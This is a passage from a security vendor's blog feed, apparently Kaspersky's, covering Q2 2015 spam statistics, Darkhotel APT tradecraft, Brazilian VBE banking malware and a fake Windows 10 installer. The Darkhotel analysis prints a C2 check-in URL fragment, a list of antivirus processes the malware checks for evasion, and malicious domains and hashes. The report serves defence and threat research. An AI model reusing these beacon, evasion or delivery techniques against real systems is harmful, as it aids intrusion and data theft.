“Nigerians” could not let political events go unnoticed. In one of the mass mailings, the fraudsters tried to lure the recipient with the sum of $2 million, which the newly elected President of Nigeria was allegedly ready to send to the user as compensation for the fraud committed by the citizens of his country.

The next Olympic Games in Brazil will not be held until 2016, but we are already registering fraudulent notifications of lottery wins dedicated to this popular sporting event. Interestingly, a large number of emails of this type was sent out in the run-up to the World Cup, while the Olympics were not mentioned. The content of the messages is standard: the lottery was held by the official organization, the recipient’s address was randomly selected out of millions of email addresses, to receive the win it is necessary to respond to the email and provide the specified personal information.

Noticeably, emails containing a short text in the body of the message, with detailed information provided in an attached PDF or DOC file, are gaining popularity with spammers. This may be because an email with a short text has more chance of passing through a spam filter as legitimate. Emails with attached files are especially dangerous because a user is likely to open the attachment to learn about the the content, which can result in malware infection.

The Google search algorithm update

Yet another event exploited in spam in the second quarter of 2015 was the release of regular update to the Google search algorithm. This changed the mobile web search results so that the sites adapted for mobile phones were displayed on top positions.

This news resulted in a significant increase in the amount of spam relating to SEO (search engine optimization) and promotion of sites. Spammers sent out offers advertising the creation of sites of any complexity and purpose, as well as services to attract new customers. They emphasized the necessity to bring the site up-to-date by using the latest features of a popular search engine. Those site owners who still had doubts were threatened with ending up as the last pages in Google search results and the resulting loss of potential customers.

Statistics Proportion of spam in email traffic

Proportion of spam in email traffic, January – June 2015

The worldwide decline in the share of spam in email traffic since the beginning of the year has almost stopped. In the second quarter of 2015 it stabilized, fluctuating between 53.5% in April and 53.23% in June.

Proportion of spam in email traffic in Russia, January – June 2015

The situation with spam in Russia is almost the same as for worldwide email traffic. During the second quarter, the share of spam traffic decreased by approximately 1 percentage point per month. Thus, the maximum quantity of spam emails in Q2 was sent in April (59.32%), while the minimum amount was distributed in June (57.47%)

Spam sources by country

Countries that were sources of spam, Q2 2015

In the second quarter of 2015 the USA (14.59%) and Russia (7.82%) remained the biggest sources of spam. China came third with 7.14% of the world’s spam, compared to 3.23% in the previous quarter. It was followed by Vietnam (5.04% compared to 4.82% in Q1), Germany (4.13% compared to 4.39% in Q1) and Ukraine (3.90% compared to 5.56% in Q1).

Spam email size

Spam email size distribution, Q1 2015 and Q2 2015

The distribution of spam emails by size saw little change from the previous quarter. The leaders were very small emails of up to 2 KB (65.38%), although the proportion of such emails has gradually decreased (it accounted for 73.99% in Q1). The share of emails sized 20-50 KB grew by 4.81 percentage points and reached 8.80%, while the percentage of emails in the size range of 2 KB-5 KB (17.16%), 5-10 KB (3.32%) and 10-20 KB (2.94%) increased slightly – by about 1 percentage point each.

Malicious email attachments

Top 10 malicious programs sent by email, Q2 2015

The notorious Trojan-Spy.HTML.Fraud.gen topped the rating. As we have written before, this program is a fake HTML page which is sent via email, imitating an important notification from a large commercial bank, an online store, a software developer, etc. This threat appears as an HTML phishing website where a user has to enter his personal data which is then forwarded to cybercriminals.

Second and third positions are occupied by Trojan-Downloader.HTML.Agent.aax and Trojan-Downloader.HTML.Meta.as. Both are HTML pages which, when opened by users, redirect them to a rigged site. There, a victim is usually faced with a phishing page or is offered a download – Binbot, a binary option trading bot. The two malicious programs spread via email attachments and the only difference between them is the link which redirects users to rigged sites.

Trojan.Win32.Fsysna.brtr rounds off the Top3. It is just a common spam bot which redirects spam from the command center to the mail server on behalf of the infected machine.

Fourth is Trojan-Banker.Win32.ChePro.ink. This downloader, which was as low as sixth position in last year’s ranking, is a CPL applet (a Control Panel component) that downloads Trojans designed to steal confidential financial information. Most malicious programs of this type are aimed at Brazilian and Portuguese banks.

It is followed by Trojan-PSW.Win32.Fareit.auqm. Fareit Trojans steal browser cookies and passwords from FTP clients and email programs and then send the data to a remote server run by the fraudsters.

Seventh and eight places are occupied by downloaders from the Upatre family – Trojan-Downloader.Win32.Upatre.fbq and Trojan-Downloader.Win32.Upatre.fca, respectively, which are usually disguised as PDF or RTF documents. Their main task is to download, unpack and run additional applications.

Exploit.MSWord.CVE-2014-1761.k. is tenth in the Q2 rating of the most popular malicious programs sent by email. It is a Word document containing an exploit which uses an appropriate vulnerability to download to the victim computer other malicious programs designed to steal user personal data.

Malware families

If popular malware families, rather than specific malicious programs, are ranked, Upatre heads the Q2 rating. Malware from the Upatre family downloads the Dyre (aka Dyreza, Dyzap) Trojan banker. The list of financial organizations attacked by this banker depends on the configuration file which is loaded from the command center.

The MSWord.Agent family is gaining popularity, although in Q1 it only occupied third position in the Top 10. These malicious programs are DOC files with an embedded macro written in Visual Basic for Applications (VBA), which runs on opening the document. It downloads and runs other malware, such as malicious programs from the Andromeda family.

In Q2 2015, ZeuS/Zbot re-entered the Top 3. The members of this family are designed to carry out attacks on servers and users’ computers and also for capturing data. Although ZeuS/Zbot is capable of carrying out various harmful actions, it is most often used to steal banking information. It can also install CryptoLocker – a malicious program that extorts money to decrypt the data that is has encrypted.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q2 2015

In the second quarter of 2015, there were major changes in the Top 3 countries most often targeted by mailshots. Germany (19.59%), which was only fourth in Q1, topped this quarter’s rating: every fifth antivirus detection was registered on the territory of this country. Great Britain, which headed the rating in Q1 2015, moved down to second position (6.31%). Brazil settled in third (6.04%).

The USA (5.03%), which was traditionally the country most often targeted by malicious mailshots, was in fourth place.

Of note is the fact that Russia (4.74%), which came only 10th in the previous quarter, climbed to fifth position in Q2 2015.

Special features of malicious spam

In the Q2 spam traffic we continued to register malicious emails with macro viruses, although the peak of distribution for these fell in the previous quarter. Although their number decreased, they still posed a serious threat: the macros we found belonged to the category of Trojan downloaders and were designed to download other malicious programs. Fraudsters trying to convince the recipient of the legitimacy of the email masked their messages as business correspondence and passed malicious attachments off as financial documents or orders.

In some emails the attackers specified the sender’s contact details, inserted logos to make the email look official and took the email address indicated in the email from the “From” field. This made the fraudulent email look even more credible for the recipient.

In Q2 2015, we also came across emails imitating official messages from real companies, and the attackers matched the content of the message to the area of the company’s activity. For example, the emails in one of the mass mailings notified the user about the alleged text message sent by the company providing telecommunications services. The recipient was told they could read it by opening the Microsoft Word attachment, but in fact the message contained Trojan-Downloader.VBS.Agent.amj.

Yet another trick which remained popular with cybercriminals who specialize in sending out malicious spam was masking messages s notifications of receipt of faxes or scans of various documents. These fake notifications are written mainly in English or German, and the attachments imitating the files with faxes or scans contain different types of malware: Trojan.Upatre, Trojan.Downloader and HawkEyePHPLogger. The text in the body of such emails could be brief or, by contrast, contain detailed information about the received document

In September 2014, we registered a malicious mass mailing with an attachment that is not typical for spam – an archive in ARJ format. In 2015, fraudsters continue to use non-conventional archives to spread malware: April’s and May’s spam traffic distributed attached archives withCAB and ACE extensions, which are not common for today’s spam. The archives contained Trojan Trojan-Downloader.Win32.Cabby and HawkEye Keylogger. Unlike such popular spam extensions as ZIP and RAR, the CAB and ACE attachments may not always be recognized by users and thus cause less suspicion.

In Q2 2015, scammers distributed attached malicious ZIP and APK files within the framework of one mass mailing. If ZIP files are found in the majority of spam messages, APK files are relatively rare because they are archived executable application files for Android. The ZIP archives contained the Upatre family Trojan, while the file Check_Updatesj.apk was detected as the encryption Trojan SLocker for Android: when run, it encrypts images, documents and video files stored on the device. After that, the message is displayed to the user asking him to pay for decrypting the files. In sending malware in attached malicious ZIP and APK files, within the framework of one mass mailing, the scammers may have thought that they could trap not only PC users but the owners of Android-based smartphones and tablets working with e-mail from these devices.

Phishing

In Q2 2015, the Anti-Phishing system was triggered 30,807,071 times on computers of Kaspersky Lab users. 509,905 masks of phishing URLs were added to the Kaspersky Lab databases over this period.

For several quarters in a row, the largest percentage of users affected by phishing attacks was in Brazil, although in Q2 2015 the number fell by half compared to the previous quarter. The same thing happened to the phishing numbers in many other countries.

Geography of phishing attacks*, Q2 2015

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

Top 10 countries by percentage of users attacked:

  Country % of users 1 Brazil 9.74% 2 India 8.3% 3 China 7.23% 4 Russia 6.78% 5 France 6.54% 6 Japan 5.93% 7 Malaysia 5.92% 8 Poland 5.81% 9 Kazakhstan 5.79% 10 UАE 5.75% Organisations under attack

The statistics on phishing attack targets are based on the heuristic component of the Anti-Phishing system being triggered. The heuristic component of Anti-Phishing is triggered when the user follows a link to a phishing page information on which is not yet included in Kaspersky Lab databases, regardless of the way in which the page was reached – as a result of clicking on a link in a phishing email, a message on a social network or, for example, as a result of a malicious program’s operation. When the component is triggered, it displays a banner in the browser, warning the user of a possible threat.

In the second quarter of 2015, the “Global Internet portals” category topped the rating of organizations attacked by phishers – its share increased by 2.78 percentage points from the previous quarter and accounted for 42.35%. The percentage of the “IMS” category (4.05%) also grew slightly (+0.13 percentage points) while the other categories showed a decline: “Social networking sites” lost 2.6 percentage points, “Banks” – 5.56 percentage points, “Online stores” – 1.56 percentage points, “E-pay systems” – 2.84 peercentage points, “Telephone and Internet service providers” – 1.33 percentage points, “Online games” – 0.78 percentage points.

Distribution of organizations affected by phishing attacks, by category, Q2 2015

Instant messaging services are popular with fraudsters for many reasons. For example, cybercriminals often use stolen accounts for sending out phishing emails or links to malicious programs to the email addresses registered in the victim’s list of contacts, distributing spam, extorting money and other fraudulent schemes.

Distribution of phishing attacks on IMS, Q2 2015

Most of the Anti-Phishing system activations in this category fall on the popular Chinese instant messaging service QQ, supported by the Tencent telecommunications company.

Phishing pages imitating QQ personal account login pages

Second comes Skype (8.88%) owned by Microsoft. Its share is incomparably smaller than that of the leader in this category.

Phishing page inviting Skype users to verify their personal account

Top 3 organizations attacked

As we have written in our previous reports, the biggest part of non-spear phishing attacks targets the users of a small group of popular companies with many customers around the world. In this way fraudsters are trying to increase their chances of hitting the target by organizing yet another phishing attack.

The Top 3 organizations most often attacked by phishers accounts for 45.14% of all detected phishing links.

  Organization % of all detected phishing links 1 Yahoo! 29.03% 2 Facebook 10.44% 3 Google 5.67%

The top three organizations targeted by phishers remained unchanged from the previous quarter. It includes Yahoo! (+23.82 percentage points), Facebook (-0.53 percentage points) and Google (-2.44 percentage points). A considerable increase in the proportion of detections of fake Yahoo! pages became possible due to the general decrease in the number of detections; in terms of numbers, the quantity of fake Yahoo! page detections increased only insignificantly.

In Q2 2015, we came across a huge number of phishing pages which imitated the publication of a Facebook page containing an intimate YouTube video. When trying to play the video, a malicious program was downloaded to the victim’s computer.

Fake Facebook pages distributing malicious files

Conclusion

In Q2 2015, the percentage of spam in email traffic accounted for 53.4%, a drop of 5.8 percentage points from the previous quarter.

In the second quarter the stories contained in “Nigerian” letters were based on real events: the upcoming Olympic Games in Rio de Janeiro, the presidential elections in Nigeria, as well as the earthquake in Nepal. Fraudsters lured the recipients not only by promising rewards or compensation, but by mentioning lottery wins and asking for a donation for the victims of the earthquake in Nepal.

The increase in the amount of SEO spam was caused by the release of the Google Search algorithm update. The purpose of the update was to raise the sites adapted to mobile phones to a higher position in mobile search results.

In the second quarter of 2015 the top three sources of spam were the USA (14.59%), Russia (7.82%) and China (7.14%).

Trojan-Spy.HTML.Fraud.gen topped the rating of malicious programs sent by email. If popular malware families, rather than specific malicious programs, are ranked, Upatre headed the Q2 rating. Germany (19.59%) was the quarter’s leader as the country most often targeted by mailshots.

Fraudsters continued to pass off attached malicious files as faxes and scans, Flash Player updates and business correspondence. They also continued to send out macro viruses in Word and Excel documents and they used CAB and ACE archives and APK files which are not typical for spam.

In Q2 2015, the Anti-Phishing system was triggered more than 30 million times on computers of Kaspersky Lab users. The largest percentage of users affected by phishing attacks was in Brazil, although the number fell by half from the previous quarter.

Microsoft Security Updates August 2015

Tue, 08/11/2015 - 18:44

Microsoft releases a new batch of fourteen security updates patching over fifty vulnerabilities today, with one of them known to be abused in targeted attacks. A large number of the vulnerabilities were reported by researchers from Google and their Project Zero, and HP’s Zero Day initiative. Meanwhile, a reflective discussion about the value of these offensive teams is laid out on offsec mailing lists.

Currently being exploited in-the-wild, MS15-085 “Vulnerability in Mount Manager Could Allow Elevation of Privilege”, enables an attacker to write out an executable to disk and run it from usb disk insertion. Exploitation is in use as a part of limited targeted attacks. Update installation and maintenance seems to be a large order here, as Microsoft includes a unique recommendation with it: “If you install a language pack after you install this update, you must reinstall this update.” Not only is “Mountmgr.sys” listed a few hundred times in this related knowledge base article, but over a hundred other files are touched with this larger update. And not only is Microsoft shipping code to close up the vulnerability, they are also shipping a new event for the event log, to identify related exploit attempts, “As part of the update, we are also shipping an event log to help defenders detect attempts to use this vulnerability on their systems”. Event ID 100: MountMgr “CVE-2015-1769″ will be logged by Windows for reference.

The new Edge web browser maintains three “memory corruption” vulnerabilities. Typically, when these arise in Microsoft’s web browsers, the flaws have been use-after-free problems. These memory corruption issues surprisingly enable remote code execution on Windows 10:
CVE-2015-2441
CVE-2015-2442
CVE-2015-2446
and one ASLR bypass issue. While the code base is smaller, faster, and newer than IE, these issues continue to crop up in their newest code.

More on Microsoft’s August 2015 Bulletins can be found here, please update your system asap.

Darkhotel’s attacks in 2015

Mon, 08/10/2015 - 08:53

Darkhotel APT attacks dated 2014 and earlier are characterized by the misuse of stolen certificates, the deployment of .hta files with multiple techniques, and the use of unusual methods like the infiltration of hotel Wi-Fi to place backdoors in targets’ systems. In 2015, many of these techniques and activities remain in use. However, in addition to new variants of malicious .hta, we find new victims, .rar attachments with RTLO spearphishing, and the deployment of a 0day from Hacking Team.

The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks. Some of the targets are diplomatic or have strategic commercial interests.

The location of Darkhotel’s targets and victims in 2015:

  • North Korea
  • Russia
  • South Korea
  • Japan
  • Bangladesh
  • Thailand
  • India
  • Mozambique
  • Germany

2015 Darkhotel .hta and backdoor-related, exploit-related and c2 sites:

  • storyonboard[.]net
  • tisone360[.]org
  • openofficev[.]info
  • saytargetworld[.]net
  • error-page[.]net
  • eonlineworld[.]net
  • enewsbank[.]net
  • thewordusrapid[.]com

2015 spearphishing incident attachment name subset:

  • schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
  • schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
  • congratulation.rar -> congratulation_?gpj.scr
  • letter.rar -> letter_?gpj.scr
Consistent use of obfuscated .hta downloaders

Whether the infection is achieved through spearphishing, physical access to a system or the Hacking Team Flash 0day, there frequently seems to be a common method for a newly-infected system to communicate with Darkhotel’s c2:

A lightly obfuscated (double escaped set of javascript variable values) script maintained within an .hta file writes an executable to disk and executes it.

It is interesting that this particular group has for years now deployed backdoor and downloader code in the form of .hta files. In 2010, we observed it re-purposing articles on North Korea by the US think-tank, Brookings Institute, in order to attack North Korean-related targets with malicious code buried in .hta files. It also emailed links to its malicious .hta files to North Korean tourist groups, economists with an interest in North Korea, and more. It’s somewhat strange to see such heavy reliance on older Windows-specific technology like HTML applications, introduced by Microsoft in 1999.

From the recent sendspace.servermsys.com/downloader.hta:

After execution and escaping a couple of variables, the .hta uses ancient Adodb.stream components in order to write out a string xor’d with 0x3d as an executable file and runs it.

This code results in the execution of “internet_explorer_Smart_recovery.exe” 054471f7e168e016c565412227acfe7f, and a hidden browser window phoning back to its c2. In this case, it seems that Darkhotel operators are checking as to whether or not the victim’s default browser is Internet Explorer, as all versions of IE return the value “0” and other browsers leave “appMinorVersion” undefined. This data collection seems somewhat odd, because .hta files are supported and run by mshta.exe on Windows systems only, still delivered with Windows 8. Perhaps it is an artefact from early development of the code. Here is a recent version:

“hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=” + navigator.appMinorVersion + “

The “internet_explorer_Smart_recovery.exe” file is a simple obfuscated downloader. A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports.

When finished, this url string decryption and connectback looks like
http://sendspace.servermsys.com/wnctprx. The file is downloaded (b1f56a54309147b07dda54623fecbb89) to “.tmp” file in %temp%, executed, and the downloader exits. This larger file is a backdoor/downloader that includes ssh functionality, and drops its keys to disk for ssh interaction. We find older Darkhotel information stealers dropped and run on the system by these downloaders.

Spearphishing and .rar Attachments with RTLO

The Darkhotel APT will relentlessly spearphish specific targets in order to successfully compromise systems. Some targets are spearphished repeatedly with much the same social-engineering schemes. For example, the attachment “schedule(2.11~16).rar” could be sent on February 10th, with Darkhotel returning to the same targets in late May for a second attempt with attachment “schedule(6.1~6).rar”.

It consistently archives RTLO .scr executable files with in .rar archives, in order to appear to the target as innocuous .jpg files. These executable files are lite droppers, maintaining these decoy jpeg files, and code to create an lnk downloader.

When the target attempts to open what they think is a jpg image file, the executable code runs and drops a jpg image to disk, then opens it with mspaint.exe in the background. This “congratulations” document is in Korean, revealing a likely characteristic of the intended target.

While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. This technique is also used by other APTs as persistence mechanisms, as documented by our Mandiant colleagues. The 64kb lnk file is downloader code:

When this lnk file is executed, it begins an AJAX-based download process for the “unzip.js” file (a07124b65a76ee7d721d746fd8047066) on openofficev.info. This is another wscript file implementing AJAX to download and execute a relatively large compiled executable:

This executable code is saved to %temp%\csrtsrm.exe and executed there. It is a relatively large executable (~1.2 mb) that injects malicious code and spawns remote threads into legitimate processes.

Stolen certificates and evasion

The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co. Ltd.

Darkhotel now tends to hide its code behind layers of encryption. It is likely that it has slowly adapted to attacking better-defended environments and prefers not to burn these stolen digital certificates. In previous attacks it would simply have taken advantage of a long list of weakly implemented, broken certificates.

Not only are its obfuscation techniques becoming stronger, but its anti-detection technology list is growing. For example, this signed downloader (d896ebfc819741e0a97c651de1d15fec) decrypts a set of anti-malware strings in stages to identify defensive technologies on a newly-infected system, and then opens each process, looking for a matching image name:

c:\avast! sandbox\WINDOWS\system32\kernel32.dll – Avast!
avp.exe – Kaspersky Lab
mcagent.exe;mcuicnt.exe – Intel/Mcafee
bdagent.exe – BitDefender
ravmon.exe,ravmond.exe – Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe – Qihoo 360
ayagent.aye,avguard.;avgntsd.exe – Avira Antivirus
ccsvchst.exe,nis.exe – Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe – Avast!
msseces.exe;msmpeng.exe – Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe – G-Data
avas.exe – TrustPort AV
tptray.exe – Toshiba utility
fsma32.exe;fsorsp.exe – F-Secure
econser.exe;escanmon.exe – Microworld Technologies eScan
SrvLoad.exe;PSHost.exe – Panda Software
egui.exe;ekrn.exe – ESET Smart Security
pctsSvc.exe;pctsGui.exe – PC Tools Spyware Doctor
casc.exe;UmxEngine.exe – CA Security Center
cmdagent.exe;cfp.exe – Comodo
KVSrvXP.exe;KVMonXP.exe – Jiangmin Antivirus
nsesvc.exe;CClaw.exe – Norman
V3Svc.exe – Ahnlab
guardxup. – IKARUS
FProtTray. – F-Prot
op_mon – Agnitum Outpost
vba332ldr.;dwengine. – DrWeb

Even the identifying information that the backdoor seeks from a system is not decrypted until runtime. Like the “information-stealer” component documented in our previous Darkhotel technical report, this component seeks to steal a set of data with which to identify the infected system. Much of the information is collected with the same set of calls, i.e. kernel32.GetDefaultSystemLangID, kernel32.GetVersion, and kernel32.GetSystemInfo:

  • Default system codepage
  • Network adapter information
  • Processor architecture
  • Hostname and IP address
  • Windows OS and Service Pack versions

Essentially, much of this information-stealer code is the same as that observed in previous attacks.

Tisone360.com, Visits, and Hacking Team Flash 0day

The tisone360.com site was especially interesting to us. In April 2015, Darkhotel was email-phishing with links to earlier (cve-2014) Flash exploits, and then, at the beginning of July, it began to distribute what is reported to be a leaked Hacking Team Flash 0day.

It looks like the Darkhotel APT may have been using the leaked HackingTeam Flash 0day to target specific systems. We can pivot from “tisone360.com” to identify some of this activity. The site was up and active as late as 22 July, 2015. However, this looks to be a small part of its activity. In addition to the icon.swf HT 0day (214709aa7c5e4e8b60759a175737bb2b), it looks as though the “tisone360.com” site was delivering a Flash CVE-2014-0497 exploit in April. We reported the related vulnerability to Adobe in January 2014, when it was being used by the Darkhotel APT.

Recently, the Darkhotel APT has maintained multiple working directories on this site.

It is the ims2 directory that is the most active. It contains a set of backdoors and exploits. The most interesting of these is the reported Hacking Team Flash 0day, icon.swf. In the days following the public mention of this server, the crew slowly tightened down open access to /ims2/. Either way, the contents continued to be actively used.

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
-> %temp%\RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

After icon.jpg is downloaded by the flash exploit, it is decoded with a multi-byte xor key 0xb369195a02. It then downloads further components.

It’s interesting to note that the group appears to be altering the compilation and linker timestamps of its executable code to dates in 2013. We see this across multiple samples deployed and observed for the first time in mid-2015, including the icon.jpg downloader.

A log of visits to the site directory records that the directory was set up on July 8th. A handful of visits to a specific url on the server from five systems based in the following locations were recorded on the 8th and 9th. Several of these are likely to be Darkhotel APT targets:

  • Germany
  • South Korea
  • China (likely to be research)
  • US
  • Japan

However, one of those systems hammered the site on the 9th, visiting almost 12,000 times in 30 minutes. This volume of traffic is likely to represent a noisy scanning research attempt and not someone DoS’ing the site:

Recorded site visits following the 9th are likely to be unreliable and may be more researchers, responding to the growing notoriety of the site following the public reports on the 9th. Many of these approximately 50 visits come from a subset of the above systems and are repeated multiple times. Visits from the following locations occurred on or after the 10th:

  • Germany (likely to be research)
  • Ukraine (likely to be research)
  • Amazon Web Services, multiple locations (likely to be research)
  • Googlebot, multiple locations
  • US
  • Ireland (likely to be research)
  • Russia
  • Brazil
  • China
  • Finland
  • Canada
  • Taiwan
  • France (likely to be research)
  • Czech Republic
A consistent attack flow

The Darkhotel group tends to stick with what works. For example, for years we saw repeated use of spearphishing targets directly with .hta files. Now, as with the tisone360.com site above, we have seen repeated use in 2015 of a creative chain of delivery sets.

downloader -> hta checkin -> info stealer -> more compiled components.
dropper -> wsh script -> wsh script -> info stealer -> more compiled components
spearphish -> dropper -> hta checkin -> downloader -> info stealer

While a chain of delivery that includes obfuscated scripts within .hta files occurred as far back as 2011, the volume appears to have picked up in 2014 and now 2015.

openofficev[.]info (2015)
office-revision[.]com (2014)
online.newssupply[.]net (2011)

Hiding infrastructure in plain sight

The group is now more vigilant in maintaining its sites, tightening up configuration and response content. Right now, its c2 responds with anti-hero images of “Drinky Crow” from the alt Maakies cartoon:

Other Darkhotel c2s tend to blend in with random sites on the web when incorrect or missing pages are visited. They are ripping images either from FOTOLIA or articles on artisanal ice cream makers here:

Technical details HTA md5:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

Spearphish attachments md5:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (first seen late 2014, used into 2015)
e85e0365b6f77cc2e9862f987b152a89 (first seen late 2014, used into 2015)

2015 large downloader md5:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Infostealers dropped in 2015

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Subhosts and urls:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2
www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

Parallel and Previous Research

CVE-2014-0497 – A 0-day Vulnerability
https://securelist.com/blog/incidents/58244/cve-2014-0497-a-0-day-vulnerability/

Hacking Team Flash Zero-Day Tied To Attacks In Korea and Japan… on July 1
http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-tied-to-attacks-in-korea-and-japan-on-july-1/

The Darkhotel APT
https://securelist.com/blog/research/66779/the-darkhotel-apt/

Wave of VBE files leading to financial fraud

Mon, 08/10/2015 - 08:20

Old tricks never die, and bad guys know that. We recently saw a big wave of malicious VBE files targeting Brazilian users, distributed via email messages. Most of the files are downloaders which, after they are executed, try to install a series of badness that goes from traditional banking Trojans to RATs to Boleto malware.

The attack started with messages like the one below, with a .ZIP file attached to the message. Some messages show only links to download the VBE file directly, using a variety of topics, such as the release of Windows 10. As you can see, the file is very small (less than 1KB) but inside is where the badness lives:

This message was sent to “Malicioso”, a mailbox where our Latin American users can send suspicious content

It’s interesting to see how mail servers still don’t block this kind of file attached to messages – all the bad guys need to do is to put the malicious file inside a ZIP or RAR and magically the message will arrive in the user’s mailbox:

Yes, Outlook.com still accept VBE/VBS files inside a ZIP

Not surprisingly the VBE file attached to the ZIP file is encoded:

Bad guys are using all kinds of encoding, in an effort to avoid detection by AV products – although most are using simple Base64 provided by Motobit software. Some are also using a commercial encoding solution, even using a demo copy:

After decoding the file we can see their real intention; this one downloads and installs Boleto malware, which is very typical for Brazil:

These malware families are detected by our product using two verdicts. Recently there has been a big increase in both  in Brazil, as illustrated by the numbers for Trojan-Downloader.VBS.Agent:

And there were almost 12,000 detection of Trojan-Downloader.VBS.Banload in just one day:

Looking at our stats worldwide, we can see that Brazil, Portugal and Spain are the most attacked countries by the VBS.Banload family this month. Not surprisingly, Brazil always leads all the rankings regarding Banking Trojan infections, even where they use a very old technique. The reason why the bad guys decide to use this is because they are still effective for some users.

Our users are protected against this kind of attack: our heuristic detection blocks most of them. Here are some MD5s of the files we detect: http://pastebin.com/Qpb6v6PQ

Blackhat USA and Defcon 2015

Fri, 08/07/2015 - 21:41

Blackhat and Defcon 2015 are being held in Las Vegas this year in the Mandalay Bay and Paris hotels, with 9,000 people in Blackhat attendance and more at Defcon. While attending Blackhat is far more expensive, you are almost assured a spot at the talks you intend on attending. At Defcon, it appears that most attendees have been assured to wait in line to miss most of the talks they are interested in, with other folks yelling about it in the halls. The Defcon organizers chose a new venue for the conference this year, and it needs to be fixed.

Blackhat had another fantastic lineup with some mind-blowing content, as in previous years. A wide range of topics were presented this year and we found several very interesting. You already may find tools on github and papers and slides for many the presentations on blackhat.com. We can expect videos of these talks on youtube in the near future. The Defcon organizers will upload a torrent of the talks as they have done in previous years:

  • four of the talks revolved around hypervisor implementations and related content, including strengths and weaknesses of current and upcoming Windows10 security architecture dependent on the hypervisor and system firmware. Pass-the-hash and golden and silver ticket defenses, Windows 10 Credential Guard and other services are all built on assumptions of a trusted boot
  • industrial PLC code injection with STL SOCKS proxy code and STL SNMP scanner for full industrial network compromise, abusing internet facing PLCs
  • unpatchable global vulnerabilities in the Globalstar GPS simplex satcom protocol, affecting military, SCADA networks, first response communications and transportation
  • a new class of escalation of privilege x86 ring -2 vulnerabilities only fixed in 2013+ intel processors, leaving 100,000,000’s that cannot be fixed

Of course, the hallway track is often as valuable as attending the talks themselves.

The Rush for Windows 10 Infects PCs with Spy Trojan

Wed, 08/05/2015 - 18:34

Due to the high demand for Windows 10, Microsoft is releasing it gradually. This especially applies to certain countries. The official Microsoft Brazil website confirms it (left image). Cybercriminals from Brazil have taken advantage of this and are running a spam campaign identical to the official design offering a fake option for users to “get your copy now”. (right image)

When the victim clicks on “Instalador Windows 10″ (Windows 10 Installer), it downloads to the system encoded VBE script:


This is a base64 encoded script, using legit Motobit software for encoding:

Once running, it drops the main trojan-spy component into the system. They also use funny Brazilian portuguese slang right inside of the code.

The dropped main banker module contains functionality to steal data from keystrokes and the clipboard. Additionally, it has backdoor capabilities for remote sessions and several anti-VM, debugging techniques.

Kaspersky Anti-Virus detects the initial VBE script as Trojan-Downloader.VBS.Agent.aok

Recently we noticed a big increase of VBS/VBE malware in Brazil, my colleague Fabio Assolini is working on a blogpost about a VBE malware widely spread in Brazil now.

Kaspersky DDoS Intelligence Report Q2 2015

Tue, 08/04/2015 - 07:55

Kaspersky Lab has an acknowledged, long-standing expertise in counteracting DDoS attacks of different types, varying degrees of complexity and strength. This is combined with Kaspersky Lab’s real-time expert monitoring of botnet activities with the help of its DDoS Intelligence system (part of the solution Kaspersky DDoS Protection) and secures the company’s cutting-edge reputation in DDoS protection.

Q2 events

Of all Q2 2015 events in the world of DDoS attacks and tools with which to launch them, we picked out those which, in our opinion, best illustrate the main trends with which these threats evolve. Cybercriminals do the following:

  • Invent and use new techniques aimed at launching more powerful attacks without increasing botnet sizes;
  • Create botnets of devices connected to the Internet, and use them to carry out DDoS attacks;
  • Develop DDoS modules for malware toolkits with which to carry out targeted attacks.
A DDoS Module in the Animal Farm toolkit

